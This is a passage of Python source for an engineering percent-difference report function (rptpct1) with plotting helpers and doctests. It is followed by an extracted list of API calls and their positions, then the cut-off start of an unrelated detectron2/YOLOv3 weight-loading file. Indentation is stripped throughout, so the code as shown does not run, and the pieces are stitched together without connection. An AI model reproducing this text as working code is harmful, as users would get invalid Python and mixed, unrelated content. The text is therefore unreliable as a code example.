elif shortabsmax:
print_info.headers1.extend([*names, ""])
print_info.headers2.extend([absmhdr, absmhdr, pdhdr])
print_info.formats.extend([numform, numform, sformatpd])
print_info.printargs.extend([ext1, ext2, spct])
print_info.widths.extend([numlen, numlen, pctlen])
print_info.seps.extend([4, 2, 2])
print_info.justs.extend(["c", "c", "c"])
else:
print_info.headers1.extend([names[0], names[0], names[0], names[1], ""])
print_info.headers2.extend([maxhdr, minhdr, absmhdr, absmhdr, pdhdr])
print_info.formats.extend([numform, numform, numform, numform, sformatpd])
print_info.printargs.extend([mxmn1[:, 0], mxmn1[:, 1], ext1, ext2, spct])
print_info.widths.extend([numlen, numlen, numlen, numlen, pctlen])
print_info.seps.extend([4, 2, 2, 2, 2])
print_info.justs.extend(["c", "c", "c", "c", "c"])
return dict(
pct=pct_ret, spct=spct, hsto=hsto, prtpv=prtpv, mag=mag, magfilt=magfilt
)
def _figure_on(name, doabsmax, show_figures):
figsize = [8.5, 11.0]
if doabsmax:
figsize[1] /= 3.0
if show_figures:
plt.figure(name, figsize=figsize)
plt.clf()
else:
plt.figure(figsize=figsize)
def _figure_off(show_figures):
if not show_figures:
plt.close()
def _prep_subplot(pctinfo, sp):
if "mx" in pctinfo:
# if not just doing absmax
if sp > 311:
plt.subplot(sp, sharex=plt.gca())
else:
plt.subplot(sp)
def _plot_magpct(
pctinfo,
names,
desc,
doabsmax,
filename,
magpct_options,
use_range,
maxhdr,
minhdr,
absmhdr,
show_figures,
tight_layout_args,
):
ptitle = f"{desc} - {{}} Comparison vs Magnitude"
xl = f"{names[1]} Magnitude"
yl = f"% Diff of {names[0]} vs {names[1]}"
_figure_on("Magpct - " + desc, doabsmax, show_figures)
try:
for lbl, hdr, sp, ismax in (
("mx", maxhdr, 311, True),
("mn", minhdr, 312, False),
("amx", absmhdr, 313, True),
):
_prep_subplot(pctinfo, sp)
if lbl in pctinfo:
if use_range:
ref = pctinfo["amx"]["mag"][1]
else:
ref = None
magpct(
pctinfo[lbl]["mag"][0],
pctinfo[lbl]["mag"][1],
Ref=ref,
ismax=ismax,
filterval=pctinfo[lbl]["magfilt"],
**magpct_options,
)
plt.title(ptitle.format(hdr))
plt.xlabel(xl)
plt.ylabel(yl)
plt.grid(True)
plt.tight_layout(**tight_layout_args)
if isinstance(filename, str):
plt.savefig(filename + ".magpct.png")
finally:
_figure_off(show_figures)
def _plot_histogram(
pctinfo,
names,
desc,
doabsmax,
filename,
histogram_inc,
maxhdr,
minhdr,
absmhdr,
show_figures,
tight_layout_args,
):
ptitle = f"{desc} - {{}} Comparison Histogram"
xl = f"% Diff of {names[0]} vs {names[1]}"
yl = "Percent Occurrence (%)"
_figure_on("Histogram - " + desc, doabsmax, show_figures)
try:
for lbl, hdr, sp in (
("mx", maxhdr, 311),
("mn", minhdr, 312),
("amx", absmhdr, 313),
):
_prep_subplot(pctinfo, sp)
if lbl in pctinfo:
width = histogram_inc
x = pctinfo[lbl]["hsto"][:, 0]
y = pctinfo[lbl]["hsto"][:, 2]
colors = ["b"] * len(x)
ax = abs(x)
pv1 = ((ax > 5) & (ax <= 10)).nonzero()[0]
pv2 = (ax > 10).nonzero()[0]
for pv, c in ((pv1, "m"), (pv2, "r")):
for i in pv:
colors[i] = c
plt.bar(x, y, width=width, color=colors, align="center")
plt.title(ptitle.format(hdr))
plt.xlabel(xl)
plt.ylabel(yl)
x = abs(max(plt.xlim(), key=abs))
if x < 5:
plt.xlim(-5, 5)
plt.grid(True)
plt.tight_layout(**tight_layout_args)
if isinstance(filename, str):
plt.savefig(filename + ".histogram.png")
finally:
_figure_off(show_figures)
def rptpct1(
mxmn1,
mxmn2,
filename,
*,
title="PERCENT DIFFERENCE REPORT",
names=("Self", "Reference"),
desc=None,
filterval=None,
labels=None,
units=None,
ignorepv=None,
uf_reds=None,
use_range=True,
numform=None,
prtbad=None,
prtbadh=None,
prtbadl=None,
flagbad=None,
flagbadh=None,
flagbadl=None,
dohistogram=True,
histogram_inc=1.0,
domagpct=True,
magpct_options=None,
doabsmax=False,
shortabsmax=False,
roundvals=-1,
rowhdr="Row",
deschdr="Description",
maxhdr="Maximum",
minhdr="Minimum",
absmhdr="Abs-Max",
perpage=-1,
tight_layout_args=None,
show_figures=False,
align_by_label=True,
):
"""
Write a percent difference report between 2 sets of max/min data
Parameters
----------
mxmn1 : 2d array_like or SimpleNamespace
The max/min data to compare to the `mxmn2` set. If 2-column
array_like, its columns are: [max, min]. If SimpleNamespace,
it must be as defined in :class:`DR_Results` and have these
members:
.. code-block:: none
.ext = [max, min]
.drminfo = SimpleNamespace which has (at least):
.desc = one line description of category
.filterval = the filter value; (see `filterval`
description below)
.labels = a list of descriptions; one per row
.ignorepv = these rows will get 'n/a' for % diff
.units = string with units
.uf_reds = uncertainty factors
Note that the inputs `desc`, `labels`, etc, override the
values above.
mxmn2 : 2d array_like or SimpleNamespace
The reference set of max/min data. Format is the same as
`mxmn1`.
.. note::
If both `mxmn1` and `mxmn2` are SimpleNamespaces and have
the ``.drminfo.labels`` attribute, this routine will, by
default, use the labels to align the data sets for
comparison. To prevent this, set the `align_by_label`
parameter to False.
filename : string or file_like or 1 or None
        Either the name of a file, or a file_like object as returned
by :func:`open` or :class:`io.StringIO`. Input as integer 1 to
write to stdout. Can also be the name of a directory or None;
in these cases, a GUI is opened for file selection.
title : string; must be named; optional
Title for the report
names : list/tuple; must be named; optional
Two (short) strings identifying the two sets of data
desc : string or None; must be named; optional
A one line description of the table. Overrides
`mxmn1.drminfo.desc`. If neither are input,
'No description provided' is used.
filterval : scalar, 1d array_like or None; must be named; optional
Numbers with absolute value <= than `filterval` will get a
'n/a' % diff. If vector, length must match number of rows in
`mxmn1` and `mxmn2` data. Overrides `mxmn1.drminfo.filterval`.
If neither are input, `filterval` is set to 1.e-6.
labels : list or None; must be named; optional
A list of strings briefly describing each row. Overrides
`mxmn1.drminfo.labels`. If neither are input,
``['Row 1','Row 2',...]`` is used.
units : string or None; must be named; optional
Specifies the units. Overrides `mxmn1.drminfo.units`. If
neither are input, 'Not specified' is used.
ignorepv : 1d array or None; must be named; optional
0-offset index vector specifying which rows of `mxmn1` to
ignore (they get the 'n/a' % diff). Overrides
`mxmn1.drminfo.ignorepv`. If neither are input, no rows are
ignored (though `filterval` is still used).
.. note::
`ignorepv` applies *before* any alignment by labels is
done (when `align_by_label` is True, which is the
default).
uf_reds : 1d array or None; must be named; optional
Uncertainty factors: [rigid, elastic, dynamic, static].
Overrides `mxmn1.drminfo.uf_reds`. If neither is input,
'Not specified' is used.
use_range : bool; must be named, optional
If True, the denominator of the % diff calc for both the max
& min for each row is the absolute maximum of the reference
max & min for that row. If False, the denominator is the
applicable reference max or min. A quick example shows why
``use_range=True`` might be useful:
.. code-block:: none
If [max1, min1] = [12345, -10] and
[max2, min2] = [12300, 50]
Then:
% diff = [0.37%, 0.49%] if use_range is True
% diff = [0.37%, 120.00%] if use_range is False
Note that the sign of the % diff is defined such that a
positive % diff means an exceedance: where ``max1 > max2`` or
``min1 < min2``.
`use_range` is ignored if `doabsmax` is True.
numform : string or None; must be named; optional
Format of the max & min numbers. If None, it is set internally
to be 13 chars wide and depends on the range of numbers to
print:
- if range is "small", numform='{:13.xf}' where "x" ranges
from 0 to 7
- if range is "large", numform='{:13.6e}'
prtbad : scalar or None; must be named; optional
Only print rows where ``abs(%diff) > prtbad``. For example, to
print rows off by more than 5%, use ``prtbad=5``. `prtbad`
takes precedence over `prtbadh` and `prtbadl`.
prtbadh : scalar or None; must be named; optional
Only print rows where ``%diff > prtbadh``. Handy for showing
just the exceedances. `prtbadh` takes precedence over
`prtbadl`.
prtbadl : scalar or None; must be named; optional
Only print rows where ``%diff < prtbadl``. Handy for showing
where reference rows are higher.
flagbad : scalar or None; must be named; optional
Flag % diffs where ``abs(%diff) > flagbad``. Works similar to
`prtbad`. The flag is an asterisk (*).
flagbadh : scalar or None; must be named; optional
Flag % diffs where ``%diff > flagbadh``. Works similar to
`prtbadh`. Handy for flagging exceedances. `flagbadh` takes
precedence over `flagbadl`.
flagbadl : scalar or None; must be named; optional
Flag % diffs where ``%diff < flagbadl``. Works similar to
`prtbadl`.
dohistogram : bool; must be named; optional
If True, plot the histograms. Plots will be written to
"`filename`.histogram.png".
histogram_inc : scalar; must be named; optional
The histogram increment; defaults to 1.0 (for 1%).
domagpct : bool; must be named; optional
If True, plot the percent differences versus magnitude via
:func:`magpct`. Plots will be written to
"`filename`.magpct.png". Filtering for the "magpct" plot is
controlled by the ``magpct_options['filterval']`` and
``magpct_options['symlogy']`` options. By default, all percent
differences are shown, but the larger values (according to the
`filterval` filter) are emphasized by using a mixed linear/log
y-axis. The percent differences for the `ignorepv` rows are
not plotted.
magpct_options : None or dict; must be named; optional
If None, it is internally reset to::
magpct_options = {'filterval': 'filterval'}
Use this parameter to provide any options to :func:`magpct`
but note that the `filterval` option for :func:`magpct` is
treated specially. Here, in addition to any of the values that
:func:`magpct` accepts, it can also be set to the string
"filterval" as in the default case shown above. In that case,
``magpct_options['filterval']`` gets internally reset to the
initial value of `filterval` (which is None by default).
.. note::
The call to :func:`magpct` is *after* applying `ignorepv`
and doing any data aligning by labels.
.. note::
The two filter value options (`filterval` and
``magpct_options['filterval']``) have different defaults:
None and 'filterval', respectively. They also differ on how
the ``None`` setting is used: for `filterval`, None is
replaced by 1.e-6 while for `magpct_filterval`, None means
that the "magpct" plot will not have any filters applied at
all.
.. note::
The above means that, if you accept the default values for
`filterval` and for ``magpct_options['filterval']``, then
tables and the histogram plots will use a `filterval` of
1.e-6 while the "magpct" plots will use no filter (it
compares everything except perfect zeros).
doabsmax : bool; must be named; optional
If True, compare only absolute maximums.
shortabsmax : bool; must be named; optional
If True, set ``doabsmax=True`` and do not print the max1 and
min1 columns.
roundvals : integer; must be named; optional
Round max & min numbers at specified decimal. If negative, no
rounding.
rowhdr : string; must be named; optional
Header for row number column
deschdr : string; must be named; optional
Header for description column
maxhdr : string; must be named; optional
Header for the column 1 data
minhdr : string; must be named; optional
Header for the column 2 data
absmhdr : string; must be named; optional
Header for abs-max column
perpage : integer; must be named; optional
The number of lines to write per page. If < 1, there is no
limit (one page).
tight_layout_args : dict or None; must be named; optional
Arguments for :func:`matplotlib.pyplot.tight_layout`. If None,
defaults to ``{'pad': 3.0}``.
show_figures : bool; must be named; optional
If True, plot figures will be displayed on the screen for
interactive viewing. Warning: there may be many figures.
align_by_label : bool; must be named; optional
If True, use labels to align the two sets of data for
comparison. See note above under the `mxmn2` option.
Returns
-------
pdiff_info : dict
Dictionary with 'amx' (abs-max), 'mx' (max), and 'mn' keys:
.. code-block:: none
<class 'dict'>[n=3]
'amx': <class 'dict'>[n=5]
'hsto' : float64 ndarray 33 elems: (11, 3)
'mag' : [n=2]: (float64 ndarray: (100,), ...
'pct' : float64 ndarray 100 elems: (100,)
'prtpv': bool ndarray 100 elems: (100,)
'spct' : [n=100]: [' -2.46', ' -1.50', ...
'mn' : <class 'dict'>[n=5]
'hsto' : float64 ndarray 33 elems: (11, 3)
'mag' : [n=2]: (float64 ndarray: (100,), ...
'pct' : float64 ndarray 100 elems: (100,)
'prtpv': bool ndarray 100 elems: (100,)
'spct' : [n=100]: [' 1.55', ' 1.53', ...
'mx' : <class 'dict'>[n=5]
'hsto' : float64 ndarray 27 elems: (9, 3)
'mag' : [n=2]: (float64 ndarray: (100,), ...
'pct' : float64 ndarray 100 elems: (100,)
'prtpv': bool ndarray 100 elems: (100,)
'spct' : [n=100]: [' -2.46', ' -1.50', ...
Where:
.. code-block:: none
'hsto' : output of :func:`histogram`: [center, count, %]
'mag' : inputs to :func:`magpct`
'pct' : percent differences
'prtpv' : rows to print partition vector
'spct' : string version of 'pct'
Examples
--------
>>> import numpy as np
>>> from pyyeti import cla
>>> ext1 = [[120.0, -8.0],
... [8.0, -120.0]]
>>> ext2 = [[115.0, -5.0],
... [10.0, -125.0]]
Run :func:`rptpct1` multiple times to get a more complete picture
of all the output (the table is very wide). Also, the plots will
be turned off for this example.
First, the header:
>>> opts = {'domagpct': False, 'dohistogram': False}
>>> dct = cla.rptpct1(ext1, ext2, 1, **opts) # doctest: +ELLIPSIS
PERCENT DIFFERENCE REPORT
<BLANKLINE>
Description: No description provided
Uncertainty: Not specified
Units: Not specified
Filter: 1e-06
Notes: % Diff = +/- abs(Self-Reference)/max(abs(Reference...
Sign set such that positive % differences indicate...
Date: ...
...
Then, the max/min/absmax percent difference table in 3 calls:
>>> dct = cla.rptpct1(ext1, ext2, 1, **opts) # doctest: +ELLIPSIS
PERCENT DIFFERENCE REPORT
...
Self Reference ...
Row Description Maximum Maximum % Diff ...
------- ----------- ------------- ------------- ------- ...
1 Row 1 120.00000 115.00000 4.35 ...
2 Row 2 8.00000 10.00000 -1.60 ...
...
>>> dct = cla.rptpct1(ext1, ext2, 1, **opts) # doctest: +ELLIPSIS
PERCENT DIFFERENCE REPORT
...
... Self Reference ...
Row Description ... Minimum Minimum % Diff ...
------- ----------- ...------------- ------------- ------- ...
1 Row 1 ... -8.00000 -5.00000 2.61 ...
2 Row 2 ... -120.00000 -125.00000 -4.00 ...
...
>>> dct = cla.rptpct1(ext1, ext2, 1, **opts) # doctest: +ELLIPSIS
PERCENT DIFFERENCE REPORT
...
... Self Reference
Row Description ... Abs-Max Abs-Max % Diff
------- ----------- ...------------- ------------- -------
1 Row 1 ... 120.00000 115.00000 4.35
2 Row 2 ... 120.00000 125.00000 -4.00
...
Finally, the histogram summaries:
>>> dct = cla.rptpct1(ext1, ext2, 1, **opts) # doctest: +ELLIPSIS
PERCENT DIFFERENCE REPORT
...
No description provided - Maximum Comparison Histogram
<BLANKLINE>
% Diff Count Percent
-------- -------- -------
-2.00 1 50.00
4.00 1 50.00
<BLANKLINE>
0.0% of values are within 1%
50.0% of values are within 2%
100.0% of values are within 5%
<BLANKLINE>
% Diff Statistics: [Min, Max, Mean, StdDev] = [-1.60, 4.35,...
<BLANKLINE>
<BLANKLINE>
No description provided - Minimum Comparison Histogram
<BLANKLINE>
% Diff Count Percent
-------- -------- -------
-4.00 1 50.00
3.00 1 50.00
<BLANKLINE>
0.0% of values are within 1%
100.0% of values are within 5%
<BLANKLINE>
% Diff Statistics: [Min, Max, Mean, StdDev] = [-4.00, 2.61,...
<BLANKLINE>
<BLANKLINE>
No description provided - Abs-Max Comparison Histogram
<BLANKLINE>
% Diff Count Percent
-------- -------- -------
-4.00 1 50.00
4.00 1 50.00
<BLANKLINE>
0.0% of values are within 1%
100.0% of values are within 5%
<BLANKLINE>
% Diff Statistics: [Min, Max, Mean, StdDev] = [-4.00, 4.35,...
"""
if tight_layout_args is None:
tight_layout_args = {"pad": 3.0}
if magpct_options is None:
magpct_options = {"filterval": "filterval"}
else:
magpct_options = magpct_options.copy()
# magpct_options['filterval'] gets special treatment:
magpct_filterval = magpct_options["filterval"]
del magpct_options["filterval"]
if isinstance(magpct_filterval, str):
if magpct_filterval != "filterval":
raise ValueError(
"``magpct_options['filterval']`` is an invalid "
f"string: {magpct_filterval!r} (can only "
"be 'filterval' if a string)"
)
# copy the initial `filterval` setting:
magpct_filterval = filterval
infovars = (
"desc",
"filterval",
"magpct_filterval",
"labels",
"units",
"ignorepv",
"uf_reds",
)
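# collect the current values of the settings above; any that are None are filled in from mxmn1.drminfo below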
dct = locals()
infodct = {n: dct[n] for n in infovars}
del dct
# check mxmn1:
if isinstance(mxmn1, SimpleNamespace):
sns = mxmn1.drminfo
for key, value in infodct.items():
if value is None:
infodct[key] = getattr(sns, key, None)
del sns
mxmn1 = mxmn1.ext
else:
mxmn1 = np.atleast_2d(mxmn1)
row_number = np.arange(1, mxmn1.shape[0] + 1)
# check mxmn2:
if isinstance(mxmn2, SimpleNamespace) and getattr(mxmn2, "drminfo", None):
labels2 = mxmn2.drminfo.labels
mxmn2 = mxmn2.ext
if align_by_label:
# use labels and labels2 to align data; this is in case
# the two sets of results recover some of the same items,
# but not all
mxmn1, mxmn2, row_number = _align_mxmn(
mxmn1, mxmn2, labels2, row_number, infodct
)
else:
mxmn2 = np.atleast_2d(mxmn2)
desc = infodct["desc"]
if desc is None:
desc = "No description provided"
R = mxmn1.shape[0]
if R != mxmn2.shape[0]:
raise ValueError(
f"`mxmn1` and `mxmn2` have a different number of rows: "
f"{R} vs {mxmn2.shape[0]} for category with `desc` = {desc}"
)
filterval = infodct["filterval"]
magpct_filterval = infodct["magpct_filterval"]
labels = infodct["labels"]
units = infodct["units"]
ignorepv = infodct["ignorepv"]
uf_reds = infodct["uf_reds"]
del infodct
if filterval is None:
filterval = 1.0e-6
filterval = _proc_filterval(filterval, R, "filterval")
magpct_filterval = _proc_filterval(
magpct_filterval, R, "magpct_options['filterval']"
)
if labels is None:
labels = [f"Row {i + 1:6d}" for i in range(R)]
elif len(labels) != R:
raise ValueError(
"length of `labels` does not match number"
f" of rows in `mxmn1`: {len(labels)} vs {R} for "
f"category with `desc` = {desc}"
)
if units is None:
units = "Not specified"
if numform is None:
numform = _get_numform(mxmn1)
pdhdr = "% Diff"
nastring = "n/a "
comppv = np.ones(R, bool)
if ignorepv is not None:
comppv[ignorepv] = False
# for row labels:
w = max(11, len(max(labels, key=len)))
frm = f"{{:{w}}}"
# start preparing for writer.formheader:
print_info = SimpleNamespace(
headers1=["", ""],
headers2=[rowhdr, deschdr],
formats=["{:7d}", frm],
printargs=[row_number, labels],
widths=[7, w],
seps=[0, 2],
justs=["c", "l"],
)
if shortabsmax:
doabsmax = True
if doabsmax:
use_range = False
if roundvals > -1:
mxmn1 = np.round(mxmn1, roundvals)
mxmn2 = np.round(mxmn2, roundvals)
prtbads = (prtbad, prtbadh, prtbadl)
flagbads = (flagbad, flagbadh, flagbadl)
# compute percent differences
pctinfo = {}
kwargs = dict(
names=names,
mxmn1=mxmn1,
comppv=comppv,
histogram_inc=histogram_inc,
numform=numform,
prtbads=prtbads,
flagbads=flagbads,
maxhdr=maxhdr,
minhdr=minhdr,
absmhdr=absmhdr,
pdhdr=pdhdr,
nastring=nastring,
doabsmax=doabsmax,
shortabsmax=shortabsmax,
print_info=print_info,
)
with warnings.catch_warnings():
warnings.filterwarnings("ignore", r"All-NaN (slice|axis) encountered")
mx1 = np.nanmax(abs(mxmn1), axis=1)
mx2 = np.nanmax(abs(mxmn2), axis=1)
if not doabsmax:
max1, min1 = mxmn1[:, 0], mxmn1[:, 1]
max2, min2 = mxmn2[:, 0], mxmn2[:, 1]
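# pass the full reference max/min only when `use_range` is True, so the % diff denominator is the abs-max of the reference range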
mxmn_b = mxmn2 if use_range else None
prtpv = np.zeros(R, bool)
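# a row is printed if the max, min, or abs-max comparison flags it, excluding the ignored rows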
for i in zip(
("mx", "mn", "amx"),
(max1, min1, mx1),
(max2, min2, mx2),
(True, False, True),
(maxhdr, minhdr, absmhdr),
):
lbl, ext1, ext2, ismax, valhdr = i
pctinfo[lbl] = _proc_pct(
ext1,
ext2,
filterval,
magpct_filterval,
mxmn_b=mxmn_b,
ismax=ismax,
valhdr=valhdr,
**kwargs,
)
prtpv |= pctinfo[lbl]["prtpv"]
prtpv &= comppv
else:
pctinfo["amx"] = _proc_pct(
mx1,
mx2,
filterval,
magpct_filterval,
mxmn_b=None,
ismax=True,
valhdr=absmhdr,
**kwargs,
)
prtpv = pctinfo["amx"]["prtpv"]
hu, frm = writer.formheader(
[print_info.headers1, print_info.headers2],
print_info.widths,
print_info.formats,
sep=print_info.seps,
just=print_info.justs,
)
# format page header:
misc = _get_filtline(filterval) + _get_noteline(use_range, names, prtbads, flagbads)
hdrs = _get_rpt_headers(desc=desc, uf_reds=uf_reds, units=units, misc=misc)
header = title + "\n\n" + hdrs + "\n"
imode = plt.isinteractive()
plt.interactive(show_figures)
try:
if domagpct:
_plot_magpct(
pctinfo,
names,
desc,
doabsmax,
filename,
magpct_options,
use_range,
maxhdr,
minhdr,
absmhdr,
show_figures,
tight_layout_args,
)
if dohistogram:
_plot_histogram(
pctinfo,
names,
desc,
doabsmax,
filename,
histogram_inc,
maxhdr,
minhdr,
absmhdr,
show_figures,
tight_layout_args,
)
finally:
plt.interactive(imode)
# write results
@ytools.write_text_file
def _wtcmp(f, header, hu, frm, printargs, perpage, prtpv, pctinfo, desc):
prtpv = prtpv.nonzero()[0]
if perpage < 1:
# one additional in case size is zero
perpage = prtpv.size + 1
pages = (prtpv.size + perpage - 1) // perpage
if prtpv.size < len(printargs[0]):
for i, item in enumerate(printargs):
printargs[i] = [item[j] for j in prtpv]
tabhead = header + hu
pager = "\n" # + chr(12)
for p in range(pages):
if p > 0:
f.write(pager)
f.write(tabhead)
b = p * perpage
e = b + perpage
writer.vecwrite(f, frm, *printargs, so=slice(b, e))
f.write(pager)
for lbl, hdr in zip(("mx", "mn", "amx"), (maxhdr, minhdr, absmhdr)):
if lbl in pctinfo:
f.write(_get_histogram_str(desc, hdr, pctinfo[lbl]))
_wtcmp(
filename, header, hu, frm, print_info.printargs, perpage, prtpv, pctinfo, desc
)
return pctinfo
|
[
"matplotlib.pyplot.grid",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.interactive",
"pyyeti.writer.vecwrite",
"numpy.arange",
"numpy.atleast_2d",
"pyyeti.locate.list_intersect",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.close",
"pyyeti.writer.formheader",
"io.StringIO",
"pyyeti.locate.index2bool",
"numpy.round",
"matplotlib.pyplot.savefig",
"numpy.ones",
"types.SimpleNamespace",
"matplotlib.pyplot.isinteractive",
"matplotlib.pyplot.gca",
"pyyeti.ytools.histogram",
"matplotlib.pyplot.xlim",
"warnings.filterwarnings",
"numpy.set_printoptions",
"numpy.atleast_1d",
"matplotlib.pyplot.clf",
"warnings.catch_warnings",
"matplotlib.pyplot.figure",
"numpy.zeros",
"matplotlib.pyplot.bar",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.subplot"
] |
[((514, 548), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'legacy': '"""1.13"""'}), "(legacy='1.13')\n", (533, 548), True, 'import numpy as np\n'), ((933, 953), 'numpy.atleast_1d', 'np.atleast_1d', (['value'], {}), '(value)\n', (946, 953), True, 'import numpy as np\n'), ((7410, 7450), 'pyyeti.ytools.histogram', 'ytools.histogram', (['pct_ret', 'histogram_inc'], {}), '(pct_ret, histogram_inc)\n', (7426, 7450), False, 'from pyyeti import ytools, locate, writer\n'), ((29772, 29804), 'numpy.arange', 'np.arange', (['(1)', '(mxmn1.shape[0] + 1)'], {}), '(1, mxmn1.shape[0] + 1)\n', (29781, 29804), True, 'import numpy as np\n'), ((31580, 31596), 'numpy.ones', 'np.ones', (['R', 'bool'], {}), '(R, bool)\n', (31587, 31596), True, 'import numpy as np\n'), ((31810, 31984), 'types.SimpleNamespace', 'SimpleNamespace', ([], {'headers1': "['', '']", 'headers2': '[rowhdr, deschdr]', 'formats': "['{:7d}', frm]", 'printargs': '[row_number, labels]', 'widths': '[7, w]', 'seps': '[0, 2]', 'justs': "['c', 'l']"}), "(headers1=['', ''], headers2=[rowhdr, deschdr], formats=[\n '{:7d}', frm], printargs=[row_number, labels], widths=[7, w], seps=[0, \n 2], justs=['c', 'l'])\n", (31825, 31984), False, 'from types import SimpleNamespace\n'), ((34068, 34217), 'pyyeti.writer.formheader', 'writer.formheader', (['[print_info.headers1, print_info.headers2]', 'print_info.widths', 'print_info.formats'], {'sep': 'print_info.seps', 'just': 'print_info.justs'}), '([print_info.headers1, print_info.headers2], print_info.\n widths, print_info.formats, sep=print_info.seps, just=print_info.justs)\n', (34085, 34217), False, 'from pyyeti import ytools, locate, writer\n'), ((34511, 34530), 'matplotlib.pyplot.isinteractive', 'plt.isinteractive', ([], {}), '()\n', (34528, 34530), True, 'import matplotlib.pyplot as plt\n'), ((34535, 34564), 'matplotlib.pyplot.interactive', 'plt.interactive', (['show_figures'], {}), '(show_figures)\n', (34550, 34564), True, 'import matplotlib.pyplot as plt\n'), ((1586, 1618), 'pyyeti.locate.index2bool', 'locate.index2bool', (['value', 'oldlen'], {}), '(value, oldlen)\n', (1603, 1618), False, 'from pyyeti import ytools, locate, writer\n'), ((1861, 1910), 'pyyeti.locate.list_intersect', 'locate.list_intersect', (["infodct['labels']", 'labels2'], {}), "(infodct['labels'], labels2)\n", (1882, 1910), False, 'from pyyeti import ytools, locate, writer\n'), ((5512, 5522), 'io.StringIO', 'StringIO', ([], {}), '()\n', (5520, 5522), False, 'from io import StringIO\n'), ((5537, 5603), 'pyyeti.writer.vecwrite', 'writer.vecwrite', (['f', '""" {:8.2f} {:8.0f} {:7.2f}\n"""', 'pctcount'], {}), "(f, ' {:8.2f} {:8.0f} {:7.2f}\\n', pctcount)\n", (5552, 5603), False, 'from pyyeti import ytools, locate, writer\n'), ((9302, 9335), 'matplotlib.pyplot.figure', 'plt.figure', (['name'], {'figsize': 'figsize'}), '(name, figsize=figsize)\n', (9312, 9335), True, 'import matplotlib.pyplot as plt\n'), ((9344, 9353), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (9351, 9353), True, 'import matplotlib.pyplot as plt\n'), ((9372, 9399), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'figsize'}), '(figsize=figsize)\n', (9382, 9399), True, 'import matplotlib.pyplot as plt\n'), ((9466, 9477), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (9475, 9477), True, 'import matplotlib.pyplot as plt\n'), ((10880, 10917), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '(**tight_layout_args)\n', (10896, 10917), True, 'import matplotlib.pyplot as plt\n'), ((12411, 12448), 
'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '(**tight_layout_args)\n', (12427, 12448), True, 'import matplotlib.pyplot as plt\n'), ((29734, 29754), 'numpy.atleast_2d', 'np.atleast_2d', (['mxmn1'], {}), '(mxmn1)\n', (29747, 29754), True, 'import numpy as np\n'), ((30311, 30331), 'numpy.atleast_2d', 'np.atleast_2d', (['mxmn2'], {}), '(mxmn2)\n', (30324, 30331), True, 'import numpy as np\n'), ((32165, 32191), 'numpy.round', 'np.round', (['mxmn1', 'roundvals'], {}), '(mxmn1, roundvals)\n', (32173, 32191), True, 'import numpy as np\n'), ((32208, 32234), 'numpy.round', 'np.round', (['mxmn2', 'roundvals'], {}), '(mxmn2, roundvals)\n', (32216, 32234), True, 'import numpy as np\n'), ((32797, 32822), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {}), '()\n', (32820, 32822), False, 'import warnings\n'), ((32832, 32901), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""', '"""All-NaN (slice|axis) encountered"""'], {}), "('ignore', 'All-NaN (slice|axis) encountered')\n", (32855, 32901), False, 'import warnings\n'), ((33166, 33183), 'numpy.zeros', 'np.zeros', (['R', 'bool'], {}), '(R, bool)\n', (33174, 33183), True, 'import numpy as np\n'), ((35333, 35355), 'matplotlib.pyplot.interactive', 'plt.interactive', (['imode'], {}), '(imode)\n', (35348, 35355), True, 'import matplotlib.pyplot as plt\n'), ((6093, 6111), 'numpy.round', 'np.round', (['(num * 10)'], {}), '(num * 10)\n', (6101, 6111), True, 'import numpy as np\n'), ((9664, 9679), 'matplotlib.pyplot.subplot', 'plt.subplot', (['sp'], {}), '(sp)\n', (9675, 9679), True, 'import matplotlib.pyplot as plt\n'), ((10857, 10871), 'matplotlib.pyplot.grid', 'plt.grid', (['(True)'], {}), '(True)\n', (10865, 10871), True, 'import matplotlib.pyplot as plt\n'), ((10968, 11005), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(filename + '.magpct.png')"], {}), "(filename + '.magpct.png')\n", (10979, 11005), True, 'import matplotlib.pyplot as plt\n'), ((12388, 12402), 'matplotlib.pyplot.grid', 'plt.grid', (['(True)'], {}), '(True)\n', (12396, 12402), True, 'import matplotlib.pyplot as plt\n'), ((12499, 12539), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(filename + '.histogram.png')"], {}), "(filename + '.histogram.png')\n", (12510, 12539), True, 'import matplotlib.pyplot as plt\n'), ((10799, 10813), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['xl'], {}), '(xl)\n', (10809, 10813), True, 'import matplotlib.pyplot as plt\n'), ((10830, 10844), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['yl'], {}), '(yl)\n', (10840, 10844), True, 'import matplotlib.pyplot as plt\n'), ((12099, 12155), 'matplotlib.pyplot.bar', 'plt.bar', (['x', 'y'], {'width': 'width', 'color': 'colors', 'align': '"""center"""'}), "(x, y, width=width, color=colors, align='center')\n", (12106, 12155), True, 'import matplotlib.pyplot as plt\n'), ((12218, 12232), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['xl'], {}), '(xl)\n', (12228, 12232), True, 'import matplotlib.pyplot as plt\n'), ((12249, 12263), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['yl'], {}), '(yl)\n', (12259, 12263), True, 'import matplotlib.pyplot as plt\n'), ((9627, 9636), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (9634, 9636), True, 'import matplotlib.pyplot as plt\n'), ((12360, 12375), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(-5)', '(5)'], {}), '(-5, 5)\n', (12368, 12375), True, 'import matplotlib.pyplot as plt\n'), ((12292, 12302), 'matplotlib.pyplot.xlim', 'plt.xlim', ([], {}), '()\n', (12300, 12302), True, 'import matplotlib.pyplot as plt\n')]
|
import torch.nn as nn
import numpy as np
import torch
import os
from detectron2.config import get_cfg
from detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, launch
from detectron2.evaluation import COCOEvaluator, verify_results
from yolov3 import add_yolov3_config
def load_darknet_weights(weights, modules):
with open(weights, 'rb') as f:
